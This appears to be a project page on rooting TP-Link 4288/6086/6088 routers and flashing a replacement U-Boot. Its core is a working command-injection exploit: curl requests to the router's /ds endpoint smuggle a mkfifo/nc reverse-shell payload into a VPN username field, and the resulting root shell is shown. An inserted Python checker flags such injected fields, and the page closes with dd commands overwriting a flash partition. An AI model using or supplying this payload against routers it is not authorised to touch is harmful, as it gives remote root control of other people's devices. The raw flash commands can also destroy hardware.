TP-Link 4288/6086/6088 immortal (unbrickable) U-Boot

Project description

Root method:

  1. Install nmap; what we actually need from it is ncat
  2. Open a terminal window and run ncat -nvlp 4444 to start listening
  3. Press F12 to open the browser developer console and find a URL of the form http://192.168.1.1/stok=/ds. In Chrome, go to the "Network" tab, find the request whose "Name" is "ds", click it, then click "Headers" in the right-hand pane to see it
  4. Next, if you are on Windows, perform the following steps in a WSL terminal. On Linux or macOS the terminal can be used directly
  5. First store the stok in an environment variable
export stok=

Then run the following command

curl http://192.168.1.1/stok=${stok}/ds -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","name":"user_1","para":{"username":";mkfifo /tmp/p;sh -i&1|nc 192.168.1.254 4444 >/tmp/p&","password":"password","type":"l2tp","localip":"192.168.1.1","ippool":"ippool","dns":"1.1.1.1","netmode":"client2lan","maxsessions":"10","remotesubnet":"192.168.1.0/24","block":"0"}},"method":"add"}'  

If it runs successfully, it returns {"error_code":0}

Continue by running the following command

curl http://192.168.1.1/stok=${stok}/ds -H "Content-Type: application/json" -X POST -d '{"vpn":{"user_1":{"username":";mkfifo /tmp/p;sh -i&1|nc 192.168.1.254 4444 >/tmp/p&","password":"password","type":"l2tp","localip":"192.168.1.1","ippool":"ippool","dns":"1.1.1.1","netmode":"client2lan","maxsessions":"10","remotesubnet":"192.168.1.0/24","block":"1"}},"method":"set"}'

If it runs successfully, it returns {"error_code":0}

At this point, in the terminal window opened in step 2, you should see a prompt like the following:

sh: can't access tty; job control turned off
BusyBox v1.19.4 (2022-07-20 12:29:22 UTC) built-in shell (ash)
Enter 'help' for a list of built-in commands.

/ #


You now have a console command prompt with root privileges.
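As an added defender-side example (not part of the original page): a small Python checker that flags shell metacharacters in the username/password fields of /ds VPN "add" and "set" request bodies, the fields this procedure abuses, plus the allowlist validator a firmware would need so such bodies never reach a shell. The request bodies are constructed samples shaped like the ones above; the field names and JSON layout are taken from the page, everything else is assumed.

```python
import json
import re

# Characters that have no place in a VPN username and that, if the value is
# spliced into a shell command line, change what the shell executes.
SHELL_META = re.compile(r'[;&|`$<>(){}\r\n]')

# Allowlist a firmware should enforce instead of passing the value through.
VALID_USERNAME = re.compile(r'^[A-Za-z0-9_.@-]{1,32}$')

def is_valid_username(value):
    """True only for usernames matching the allowlist (hardened check)."""
    return isinstance(value, str) and VALID_USERNAME.fullmatch(value) is not None

def find_injections(body):
    """Parse a /ds POST body and return [(field_path, value)] for every
    username/password containing shell metacharacters.  Handles both the
    'add' shape (vpn.table/name/para) and the 'set' shape (vpn.<user>.{...})."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return []
    vpn = doc.get("vpn") if isinstance(doc, dict) else None
    if not isinstance(vpn, dict):
        return []
    candidates = []
    if isinstance(vpn.get("para"), dict):
        candidates.append(("para", vpn["para"]))           # 'add' shape
    for key, val in vpn.items():
        if isinstance(val, dict) and key != "para":
            candidates.append((key, val))                   # 'set' shape
    hits = []
    for prefix, params in candidates:
        for field in ("username", "password"):
            val = params.get(field)
            if isinstance(val, str) and SHELL_META.search(val):
                hits.append((f"vpn.{prefix}.{field}", val))
    return hits

# Constructed sample bodies (not captured traffic), in the page's two layouts.
SAMPLE_REQUESTS = {
    "add_benign": '{"vpn":{"table":"user","name":"user_1","para":{"username":"alice","password":"s3cret","type":"l2tp"}},"method":"add"}',
    "add_injected": '{"vpn":{"table":"user","name":"user_1","para":{"username":"alice;id >/tmp/out","password":"password","type":"l2tp"}},"method":"add"}',
    "set_injected": '{"vpn":{"user_1":{"username":"alice;id >/tmp/out","password":"password","type":"l2tp","block":"1"}},"method":"set"}',
}

if __name__ == "__main__":
    for name, body in SAMPLE_REQUESTS.items():
        print(name, find_injections(body))
```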

-----------------------------------------------------------------------------------------------------------


After obtaining root ssh on the stock firmware, first use WinSCP to upload the extracted files to the router's /tmp, then run the following commands

cd /tmp

dd bs=131072 conv=sync of=/dev/mtdblock9 if=xdr608x-bl2.bin

dd bs=131072 conv=sync of=/dev/mtdblock9 seek=28 if=xdr608x-fip.bin

sync

After rebooting, hold the reset button to enter the U-Boot web interface at http://192.168.1.1, where firmware in either sysupgrade format or the official format can be flashed


Created: